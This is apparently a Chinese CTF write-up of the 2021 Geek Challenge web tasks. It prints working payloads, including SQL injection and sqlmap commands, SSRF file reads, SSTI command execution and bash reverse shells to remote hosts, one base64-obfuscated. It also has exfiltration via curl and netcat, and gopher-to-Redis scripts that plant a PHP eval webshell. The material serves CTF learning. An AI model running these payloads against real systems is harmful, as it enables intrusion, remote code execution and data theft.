2021极客大挑战(1)

文章目录

    • 极客大挑战2021
      • Welcome2021
      • Dark
      • babysql
      • babyphp
      • Baby_PHP_Black_Magic_Enlightenment
      • 蜜雪冰城甜蜜蜜
      • 雷克雅未克
      • babyxss
      • 人民艺术家
      • babyPy
      • where_is_my_FUMO
      • babyPOP
      • givemeyourlove

极客大挑战2021

Welcome2021

考点:http头请求方法
F12,提示请使用WELCOME请求方法来请求此网页
burp抓包,修改请求方法,发现f1111aaaggg9.php
再次请求得到flag
2021极客大挑战(1)_第1张图片

Dark

Tor浏览器(洋葱浏览器)直接访问访问即可。
但前提自己需要去配好Tor浏览器。

babysql

考点:没有任何过滤的union注入

前面还是先查是整数注入还是字符注入

查列数

uname=1' order by 4#

查库:babysql

uname=-1' union select database(),2,3,4#&pwd=1

查表:jeff,jeffjokes

uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()%23&pwd=1
查列:

jeff

uname,pwd,zzzz,uselesss

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeff"%23&pwd=1

jeffjokes

id,english,chinese,misc,useless

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name="jeffjokes"%23&pwd=1

查数据:没有查出flag

uname=-1' union select group_concat(chinese),2,3,4 from jeffjokes#&pwd=1

这儿我开始特别懵,疯狂检查我语句,试了每一表的每一个列,但是都不对。

有一句话,猜测是提示:

编译器从来不给Jeff编译警告,而是Jeff警告编译器,所有指针都是指向Jeff的,gcc的-O4优化选项是将你的代码邮件给Jeff重写一下,当Jeff触发程序的程序性能采样时,循环会因害怕而自动展开。,Jeff依然孤独地等待着数学家们解开他在PI的数字中隐藏的笑话

这是谷歌大神jeff bean的事迹

最后发现找错库了

用sqlmap爆了一下

ps: 属于sqlmap的post注入

查库:
python3 sqlmap.py -r "D:\Desktop\5.txt" -p uname --dbs
python3 sqlmap.py -r 1.txt -p uname -D flag -T fllag -C  "fllllllag" --dump

babyphp

robots.txt,得到noobcurl.php

 <?php
function ssrf_me($url){
     
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        curl_close($ch);
        echo $output;
}

if(isset($_GET['url'])){
     
    ssrf_me($_GET['url']);
}
else{
     
    highlight_file(__FILE__);
        echo "";
}

考察ssrf,可以看看我的文章

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 屏蔽回显
先试试file协议

file:///etc/passwd

有回显
提示flag在根目录,直接去根目录找了。

file:///flag

Baby_PHP_Black_Magic_Enlightenment

 <?php
echo "PHP is the best Language 
"
; echo "Have you ever heard about PHP Black Magic
"
; error_reporting(0); $temp = $_GET['password']; is_numeric($temp)?die("no numeric"):NULL; if($temp>9999){ echo file_get_contents('./2.php'); echo "How's that possible"; } highlight_file(__FILE__); //Art is long, but life is short. ?>

第一步:弱比较

绕过is_numeric,直接弱类型比较

?password=10000a

提示baby_magic.php,就是个sha1加密,要求加密前和加密后相等,但是加密前是弱类型,加密后是强类型,所以用数组绕过。

 <?php
error_reporting(0);

$flag=getenv('flag');
if (isset($_GET['name']) and isset($_GET['password'])) 
{
     
    if ($_GET['name'] == $_GET['password'])
        echo '

Your password can not be your name!

'
; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo '

Invalid password.

'
; } else echo '

Login first!

'
; highlight_file(__FILE__); ?>

第二步:数组绕过

?name[]=1&password[]=2

提示baby_revenge.php,过滤了数组,所以不能用数组绕了,那就强碰撞


error_reporting(0);

$flag=getenv('fllag');
if (isset($_GET['name']) and isset($_GET['password'])) 
{
     
    if ($_GET['name'] == $_GET['password'])
        echo '

Your password can not be your name!

'
; else if(is_array($_GET['name']) || is_array($_GET['password'])) die('There is no way you can sneak me, young man!'); else if (sha1($_GET['name']) === sha1($_GET['password'])){ echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon
"
; die('Genji:We will see again Hanzo'.$flag.'
'
); } else echo '

Invalid password.

'
; }else echo '

Login first!

'
; highlight_file(__FILE__); ?>

第三步:由于sha1是强比较,利用sha1碰撞,传入两个SHA1值相同而不一样的pdf文件

?name=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&password=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1 

提示:here_s_the_flag.php,最后一步了

 <?php
$flag=getenv('flllllllllag');
if(strstr("hackerDJ",$_GET['id'])) {
     
  echo("

not allowed!

"
); exit(); } $_GET['id'] = urldecode($_GET['id']); if($_GET['id'] === "hackerDJ") { echo "

Access granted!

"
; echo "

flag: $flag

"
; } highlight_file(__FILE__); ?>

strstr() 函数搜索字符串在另一字符串中的第一次出现。

也就是说不能出现hackerDJ否则退出循环。在这之后又是强比较判断。

这儿因为GET传入参数要urldecode一次,代码中urldecode一次,所以两次解码

方法:url二次编码绕过

?id=hackerD%254A

附上我自己写的php脚本

$a='flag';
$final='';
$c=urlencode('%');//得到最后的%
for($i=0;$i<strlen($a);$i++){
     
    $b1=bin2hex($a[$i]);//第一次编码,
    $final=$final.$c;
    for($j=0;$j<strlen($b1);$j++){
     
        $b2=bin2hex($b1[$j]);
        $mid='%'.$b2;
        $final.=$mid;
    }
}
echo $final.PHP_EOL;
echo urldecode($final).PHP_EOL;
echo urldecode(urldecode($final)).PHP_EOL;
echo urldecode(urldecode(urldecode($final)));
?>

不仅可以二次编码,还可以三次编码(只需要把解码后的一次编码赋值给$a)

蜜雪冰城甜蜜蜜

查看源码

/*
 * 生成签名
 * @params  待签名的json数据
 * @secret  密钥字符串
 */
function makeSign(params, secret){
     
    var ksort = Object.keys(params).sort();
    var str = '';
    for(var ki in ksort){
      
    str += ksort[ki] + '=' + params[ksort[ki]] + '&'; 
    }

    str += 'secret=' + secret;
    var token = hex_md5(str).toUpperCase();
    return rsa_sign(token);
}

/*
 * rsa加密token
 */
function rsa_sign(token){
     
     var pubkey='-----BEGIN PUBLIC KEY-----';
    pubkey+='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAbfx4VggVVpcfCjzQ+nEiJ2DL';
    pubkey+='nRg3e2QdDf/m/qMvtqXi4xhwvbpHfaX46CzQznU8l9NJtF28pTSZSKnE/791MJfV';
    pubkey+='nucVcJcxRAEcpPprb8X3hfdxKEEYjOPAuVseewmO5cM+x7zi9FWbZ89uOp5sxjMn';
    pubkey+='lVjDaIczKTRx+7vn2wIDAQAB';
    pubkey+='-----END PUBLIC KEY-----';
    // 利用公钥加密
    var encrypt = new JSEncrypt();
    encrypt.setPublicKey(pubkey);
    return encrypt.encrypt(token);
}

/*
 * 获取时间戳
 */
function get_time(){
     
    var d = new Date();
    var time = d.getTime()/1000;
    return parseInt(time);
}

//secret密钥
var secret = 'e10adc3949ba59abbe56e057f20f883e';

$("[href='#']").click(function(){
     

    var params = {
     };
    console.log(123);
    
    params.id = $(this).attr("id");
    params.timestamp = get_time();
    params.fake_flag= 'SYC{lingze_find_a_girlfriend}';
    params.sign = makeSign(params, secret);
    $.ajax({
     
        url : "http://106.55.154.252:8083/sign.php",
        data : params,
        type:'post',
        success:function(msg){
     
            $('#text').html(msg);
            alert(msg);
        },
        async:false

    });

})

发现需要验证,其中将id也加密了,但是发现跟代码关系不大。

感觉考点就是,前端的网页可以任意更改。

所以尝试前端js修改id为9,再点击,得到flag

雷克雅未克

2021极客大挑战(1)_第2张图片

题目要求经纬度和ip地址,修改两个地方

得到一串jsfuck,直接放到浏览器控制台输出即可

babyxss

<script>
function check(input){
     input = input.replace(/alert/,'');return '';}
</script>

给出了代码,发现过滤了alert且input内容用引号包裹。

所以我们思路是,先用引号闭合,独立出语句。再用

payload:

'");\u0061lert(1);("'

本来想用hex编码,但是好像不行。

人民艺术家

考点就是:jwt

登录错误后跳转/fail.php,提示正确的账号密码

2021极客大挑战(1)_第3张图片

发现有一串JWT,且提示需要2019年的管理员

2021极客大挑战(1)_第4张图片

猜测需要修改time为2019,name为admin

使用jwtcrack爆破一下密钥

image-20211022232814717

新增header为JWT

2021极客大挑战(1)_第5张图片

得到flag

babyPy

一道简单的ssti

先跑出os._wrap_close,显示133

import json

a = """
,...,
"""

num = 0
allList = []

result = ""
for i in a:
    if i == ">":
        result += i
        allList.append(result)
        result = ""
    elif i == "\n" or i == ",":
        continue
    else:
        result += i

for k, v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k) + "--->" + v)

所以构造payoad

{
    {"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('cat /flag').read()}}

关于过滤的ssti,可以结合这三篇文章

羽师傅

Y4师傅

先知上的文章

where_is_my_FUMO

 <?php
function chijou_kega_no_junnka($str) {
     
    $black_list = [">", ";", "|", "{", "}", "/", " "];
    return str_replace($black_list, "", $str);
}

if (isset($_GET['DATA'])) {
     
    $data = $_GET['DATA'];
    $addr = chijou_kega_no_junnka($data['ADDR']);
    $port = chijou_kega_no_junnka($data['PORT']);
    exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {
     
    highlight_file(__FILE__);
} 

直接说清楚了,反弹shell

bash -c "bash -i < /dev/tcp/addr/port"

写一个脚本反弹

import requests
url='http://1.14.102.22:8115/'
params={
     
    'DATA[ADDR]':'xxxx',
    'DATA[PORT]':'10000'
    }
headers={
     
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
a=requests.get(url=url,params=params,headers=headers)
print(a.text)

发现能成功反弹,但是无法执行命令,应该是由于执行的是输入重定向导致攻击机无法回显
那么如果我们利用这个输入的shell在靶机上再执行一次反弹shell并监听呢?
第一个方法:先反弹shell之后,再在攻击机上输入(这人需要换一个端口)

bash -i >& /dev/tcp/xxx/1212 0>&1

第二个方法:直接使用文件描述符

DATA[ADDR]=ip&DATA[PORT]=port%091<%260
因为空格被过滤了 ,我们使用%09来代替,让被攻击机的回显返回到攻击机上。   

开始执行命令

2021极客大挑战(1)_第6张图片
提示说flag在根目录的图片中,但是命令行不能处理图片

第一种方法:利用base64或者二进制编码处理

因为终端有长度限制,所以使用tail与head截取
cat /flag.png | base64 | tail -n +1|head -n 8000

cat /flag.png | base64 | tail -n +8001|head -n 8000

每次读8000行,读两次,把读取到的base64编码转为图片就好了

第二种方法:

nc -lvvnp 1234 > flag.png  //自己服务器
cat /flag.png >/dec/tcp/xxxxx/1234  //命令行

第三种方法:

服务器先新建一个文件


//highlight_file(__FILE__);
$uploaddir = '/var/www/html/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
 
echo '
';
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
     
    echo "File is valid, and was successfully uploaded.\n";
} else {
     
    echo "Possible file upload attack!\n";
}
 
echo 'Here is some more debugging info:';
print_r($_FILES);
 
print "
"
; ?>
curl -F "userfile=@/flag.png" http://youip/upload.php

然后直接访问就可以得到图片显示。

参考文章:

linux反弹shell

babyPOP

 <?php
class a {
     
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
     
    private $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
     
        if (a::$Do_u_like_AFKL) {
     
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
     
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
     
    public function __wakeup()
    {
     
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
     
    public function __invoke()
    {
     
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
     
    public function __destruct()
    {
     
        if (a::$Do_u_like_JiaRan) {
     
            ($this->afkl)();
        } else {
     
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

if (isset($_GET['data'])) {
     
    unserialize(base64_decode($_GET['data']));
} else {
     
    highlight_file(__FILE__);
} 

前置:

__toString:类被当成字符串时的回应方法 
__invoke():调用函数的方式调用一个对象时的回应方法
__wakeup:执行unserialize()时,先会调用这个函数
__destruct:类的析构函数

代码审计:

思路:首先我们的目的是通过b类中的exec函数执行命令,但是值得注意的是exec函数没有回显,所以们不能用常规的命令执行来处理,可以用服务器来帮助。

第一步:我们需要从c进入,然后进入e$this->afkl();可以触发d中的东西,然后通过d中的"关注嘉然," . $this->value来触发b中的String从,从而执行命令。


class a {
     
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b {
     
    public $i_want_2_listen_2_MaoZhongDu;
    public function __toString()
    {
     
        if (a::$Do_u_like_AFKL) {
     
            // return exec($this->i_want_2_listen_2_MaoZhongDu);
            return "123";
        } else {
     
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c {
     
    public $aaa;
    public function __wakeup()
    {
     
        a::$Do_u_like_JiaRan = true;
    }
}

class d {
     
    public function __invoke()
    {
     
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e {
     
    public function __destruct()
    {
     
        if (a::$Do_u_like_JiaRan) {
     
            $this->afkl();    //这个地方要将前面的括号去掉,否则在windows下跑不出来
        } else {
     
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}
$c = new c;
$e = new e;
$d = new d;
$b = new b;

$b->i_want_2_listen_2_MaoZhongDu="bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTMuMTcwLjxMDAwMCAwPiYx}|{base64,-d}|{bash,-i}'";    //服务器开启监听
$d->value = $b;
$e->afkl = $d;
$c->aaa = $e;
echo base64_encode(serialize($c));

其中对b参数赋值

这个也可以 curl http://xxx?c=$(cat /flag) --还是监听端口
但是"bash -c 'bash -i >& /dev/tcp/ip/port 0>&1\'

在反弹shell时虽然能正常交互,但服务器会报

sh: cannot set terminal process group (-1): Inappropriate ioctl for device
sh: no job control in this shell

可能原因

That error message likely means shell is probably calling tcsetpgrp() and getting back errno=ENOTTY. That can happen if the shell process does not have a controlling terminal. The kernel doesn't set that up before running init on /dev/console.
The solution: use a real terminal device like /dev/tty0.

然后flag就在根目录。

知识点:

关于命令执行函数:
1. system:执行系统和外部命令,并输出出来
2. ` `:执行命令,但是不会输出出来,如果要输出出来,需要echo `命令部分`
3. exec:执行命令,但是不会输出出来
	string exec ( string $command [, array &$output [, int &$return_var ]] )
	Command:表示要执行的命令
	Output:这是一个数组,用于接收exec函数执行后返回的字符串结果
	return_var:记录exec函数执行后返回的状态
4.passthru:执行系统命令并输出结果
	void passthru( string $command[, int &$return_var] ) 
5.shell_exec():用于执行shell命令并将执行的结果以字符串的形式返回,但是不会将结果进行输出。
	如果输出的话,print(or echo)shell_exec()
6.popen:popen函数会将执行后的系统命令结果用一个文件指针的形式返回。
	popen(命令,文件打开模式)
7.proc_open:执行一个命令,并且打开用来输入/输出的文件指针。类似于popen函数

givemeyourlove


// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{
     
    echo 'NO NO HACKING!!';
    die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);   
curl_close($ch);  
?> 

提示幸运数字是123123,说明就是密码

打有认证redis

常规思路我们需要用?url=dict://127.0.0.1:port来爆破,探测端口,但是dict被禁用了,直接使用默认端口6379

直接跑脚本

import urllib.parse
protocol="gopher://"
ip="127.0.0.1"
port="6379"
shell="\n\n\n\n"
filename="1.php"
path="/var/www/html"
passwd="123123"
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="\r\n"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(urllib.parse.quote(payload))

结果

gopher%3A//127.0.0.1%3A6379/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25246%250D%250A123123%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522cmd%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25245%250D%250A1

然后就访问1.php,GET参数cmd进行命令执行。

还有个脚本

# -*- coding: UTF-8 -*-
from urllib.parse import quote
from urllib.request import Request, urlopen

url = "http://1.14.71.112:44423/?url="
gopher = "gopher://127.0.0.1:6379/_"

def get_password():
    f = open("message.txt", "r")   ###密码文件
    return f.readlines()

def encoder_url(cmd):
    urlencoder = quote(cmd).replace("%0A", "%0D%0A")
    return urlencoder

###------暴破密码,无密码可删除-------###
for password in get_password():
    # 攻击脚本
    path = "/var/www/html"
    shell = "\\n\\n\\n\\n\\n\\n"
    filename = "shell.php"

    cmd = """
    auth %s
    quit
    """ % password
    # 二次编码
    encoder = encoder_url(encoder_url(cmd))
    # 生成payload
    payload = url + gopher + encoder
    # 发起请求
    print(payload)
    request = Request(payload)
    response = urlopen(request).read().decode()
    print("This time password is:" + password)
    print("Get response is:")
    print(response)
    if response.count("+OK") > 1:
        print("find password : " + password)
        #####---------------如无密码,直接从此开始执行---------------#####
        cmd = """
        auth %s
        config set dir %s
        config set dbfilename %s
        set test1 "%s"
        save
        quit
        """ % (password, path, filename, shell)
        # 二次编码
        encoder = encoder_url(encoder_url(cmd))
        # 生成payload
        payload = url + gopher + encoder
        # 发起请求
        request = Request(payload)
        print(payload)
        response = urlopen(request).read().decode()
        print("response is:" + response)
        if response.count("+OK") > 5:
            print("Write success!")
            exit()
        else:
            print("Write failed. Please check and try again")
            exit()
        #####---------------如无密码,到此处结束------------------#####
print("Password not found!")
print("Please change the dictionary,and try again.")

跑个脚本,进入shell.php

尝试POST数据cmd=phpinfo()

2021极客大挑战(1)_第7张图片

有回显,说明写入成功,蚁剑连接,flag在根目录

使用反弹shell的方法不知道为什么没有连接上,之后再看看吧!(似乎只能centos)

参考文章:

https://www.freebuf.com/articles/web/263556.html

https://blog.csdn.net/qq_43665434/article/details/115414738

https://xz.aliyun.com/t/5665#toc-4

https://ca01h.top/Web_security/basic_learning/17.SSRF%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#%E6%BC%8F%EQ6%B4%9E%E4%BA%A7%E7%94%9F

你可能感兴趣的:(CTF训练日记,python,开发语言,后端)